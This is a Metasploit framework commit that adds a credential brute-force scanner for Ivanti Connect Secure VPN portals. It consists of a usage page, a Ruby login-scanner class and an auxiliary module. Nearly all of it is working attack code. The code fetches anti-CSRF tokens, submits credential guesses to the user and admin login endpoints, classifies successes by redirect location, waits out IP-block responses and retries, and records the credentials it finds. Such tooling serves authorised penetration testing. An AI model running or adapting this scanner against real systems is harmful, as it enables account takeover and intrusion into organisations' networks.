Land rapid7#19844, Add Ivanti Connect Secure HTTP Login Module

dledda-r7 · web-flow · commit ba8d5b7f5ad2 · 2025-02-03T18:17:36.000+01:00
diff --git a/documentation/modules/auxiliary/scanner/ivanti/login_scanner.md b/documentation/modules/auxiliary/scanner/ivanti/login_scanner.md
@@ -0,0 +1,19 @@
+## Description
+
+The module performs bruteforce attack against Ivanti Connect Secure.
+It allows to attack both regular user and admin as well - you can select which type of account to attack with `ADMIN` parameter. 
+
+## Vulnerable Application
+
+- [Ivanti](https://www.ivanti.com/products/connect-secure-vpn)
+
+## Verification Steps
+
+1. `use auxiliary/scanner/ivanti/login_scanner`
+2. `set RHOSTS [IP]`
+3. either `set USERNAME [username]` or `set USERPASS_FILE [usernames file]`
+4. either `set PASSWORD [password]` or `set PASS_FILE [passwords file]`
+5. `set ADMIN [attack admin?]`
+6. `run`
+
+
diff --git a/lib/metasploit/framework/login_scanner/ivanti_login.rb b/lib/metasploit/framework/login_scanner/ivanti_login.rb
@@ -0,0 +1,169 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      # Ivanti Login Scanner supporting
+      # - User Login
+      # - Admin Login
+      class Ivanti < HTTP
+
+        def initialize(scanner_config, admin)
+          @admin = admin
+          super(scanner_config)
+        end
+
+        def create_admin_request(username, password, token, protocol, peer)
+          {
+            'method' => 'POST',
+            'uri' => normalize_uri('/dana-na/auth/url_admin/login.cgi'),
+            'ctype' => 'application/x-www-form-urlencoded',
+            'headers' =>
+            {
+              'Origin' => "#{protocol}://#{peer}",
+              'Referer' => "#{protocol}://#{peer}/dana-na/auth/url_admin/welcome.cgi"
+            },
+            'vars_post' => {
+              tz_offset: '60',
+              xsauth_token: token,
+              username: username,
+              password: password,
+              realm: 'Admin+Users',
+              btnSubmit: 'Sign+In'
+
+            },
+            'encode_params' => false
+          }
+        end
+
+        def do_admin_logout(cookies)
+          admin_page_res = send_request({ 'method' => 'GET', 'uri' => normalize_uri('/dana-admin/misc/admin.cgi?'), 'cookie' => cookies })
+          admin_page_s = admin_page_res.to_s
+          re = /xsauth=[a-z0-9]{32}/
+          xsauth = re.match(admin_page_s)
+
+          return nil if xsauth.nil?
+
+          send_request({ 'method' => 'GET', 'uri' => normalize_uri('/dana-na/auth/logout.cgi?' + xsauth[0]), 'cookie' => cookies })
+        end
+
+        def get_token
+          res = send_request({
+            'uri' => normalize_uri('/dana-na/auth/url_admin/welcome.cgi')
+          })
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to the Ivanti service' } if res.nil?
+
+          html_document = res.get_html_document
+          html_document.xpath('//input[@id="xsauth_token"]/@value')&.text
+        end
+
+        def do_admin_login(username, password)
+          token = get_token
+
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to the Ivanti service' } if token.blank?
+
+          protocol = ssl ? 'https' : 'http'
+          peer = "#{host}:#{port}"
+          admin_req = create_admin_request(username, password, token, protocol, peer)
+          begin
+            res = send_request(admin_req)
+          rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error, ::EOFError => e
+            return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e }
+          end
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to the Ivanti service' } if res.nil?
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: "Received an unexpected status code: #{res.code}" } if res.code != 302
+
+          return { status: ::Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.to_s } if res.headers['location'] == '/dana-na/auth/url_admin/welcome.cgi?p=admin%2Dconfirm'
+
+          if res.headers['location'] == '/dana-admin/misc/admin.cgi'
+            do_admin_logout(res.get_cookies)
+            return { status: ::Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.to_s }
+          end
+
+          return { status: ::Metasploit::Model::Login::Status::INCORRECT, proof: res.to_s }
+        end
+
+        def create_user_request(username, password, protocol, peer)
+          {
+            'method' => 'POST',
+            'uri' => normalize_uri('/dana-na/auth/url_default/login.cgi'),
+            'ctype' => 'application/x-www-form-urlencoded',
+            'headers' =>
+            {
+              'Origin' => "#{protocol}://#{peer}",
+              'Referer' => "#{protocol}://#{peer}/dana-na/auth/url_default/welcome.cgi"
+            },
+            'vars_post' =>
+              {
+                tz_offset: '',
+                win11: '',
+                clientMAC: '',
+                username: username,
+                password: password,
+                realm: 'Users',
+                btnSubmit: 'Sign+In'
+              },
+            'encode_params' => false
+          }
+        end
+
+        def do_logout(cookies)
+          send_request({ 'uri' => normalize_uri('/dana-na/auth/logout.cgi?delivery=psal'), 'cookie' => cookies })
+        end
+
+        def do_login(username, password)
+          protocol = ssl ? 'https' : 'http'
+          peer = "#{host}:#{port}"
+          user_req = create_user_request(username, password, protocol, peer)
+          begin
+            res = send_request(user_req)
+          rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error, ::EOFError => e
+            return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e }
+          end
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to the Ivanti service' } if res.nil?
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: "Received an unexpected status code: #{res.code}" } if res.code != 302
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unexpected response' } if res.blank?
+
+          if res.headers['location'] == '/dana-na/auth/url_default/welcome.cgi?p=ip%2Dblocked'
+            sleep(2 * 60) # 2 minutes
+            res = send_request(user_req)
+          end
+
+          return { status: ::Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.to_s } if res.headers['location'] == '/dana-na/auth/url_default/welcome.cgi?p=user%2Dconfirm'
+
+          if res.headers['location'] == '/dana/home/starter0.cgi?check=yes'
+            do_logout(res.get_cookies)
+            return { status: ::Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.to_s }
+          else
+            return { status: ::Metasploit::Model::Login::Status::INCORRECT, proof: res.to_s }
+          end
+        end
+
+        # Attempts to login to the server.
+        #
+        # @param [Metasploit::Framework::Credential] credential The credential information.
+        # @return [Result] A Result object indicating success or failure
+        def attempt_login(credential)
+          # focus on creating Result object, pass it to #login routine and return Result object
+          result_options = {
+            credential: credential,
+            host: @host,
+            port: @port,
+            protocol: 'tcp',
+            service_name: 'ivanti'
+          }
+
+          if @admin
+            login_result = do_admin_login(credential.public, credential.private)
+          else
+            login_result = do_login(credential.public, credential.private)
+          end
+
+          result_options.merge!(login_result)
+          Result.new(result_options)
+        end
+
+      end
+    end
+  end
+end
diff --git a/modules/auxiliary/scanner/ivanti/login_scanner.rb b/modules/auxiliary/scanner/ivanti/login_scanner.rb
@@ -0,0 +1,88 @@
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/ivanti_login'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::ReportSummary
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Connect Secure HTTP Scanner',
+        'Description' => %q{
+          This module will perform authentication scanning against Ivanti Connect Secure
+        },
+        'Author' => ['msutovsky-r7'],
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS]
+        }
+      )
+         )
+    register_options([
+      OptBool.new('ADMIN', [true, 'Select whether to test admin account', false])
+    ])
+  end
+
+  def get_scanner(ip)
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS']
+    )
+    configuration = configure_http_login_scanner(
+      host: ip,
+      port: datastore['RPORT'],
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+      connection_timeout: datastore['HttpClientTimeout'] || 5
+    )
+    return Metasploit::Framework::LoginScanner::Ivanti.new(configuration, datastore['ADMIN'])
+  end
+
+  def process_credential(credential_data)
+    credential_combo = "#{credential_data[:username]}:#{credential_data[:private_data]}"
+    case credential_data[:status]
+    when Metasploit::Model::Login::Status::SUCCESSFUL
+      print_good "#{credential_data[:address]}:#{credential_data[:port]} - Login Successful: #{credential_combo}"
+      credential_data[:core] = create_credential(credential_data)
+      create_credential_login(credential_data)
+      return { status: :success, credential: credential_data }
+    else
+      error_msg = "#{credential_data[:address]}:#{credential_data[:port]} - LOGIN FAILED: #{credential_combo} (#{credential_data[:status]})"
+      vprint_error error_msg
+      invalidate_login(credential_data)
+      return { status: :fail, credential: credential_data }
+    end
+  end
+
+  def run_scanner(scanner)
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(module_fullname: fullname, workspace_id: myworkspace_id)
+      process_credential(credential_data)
+    end
+  end
+
+  def run_host(ip)
+    scanner = get_scanner(ip)
+    run_scanner(scanner)
+  end
+
+end
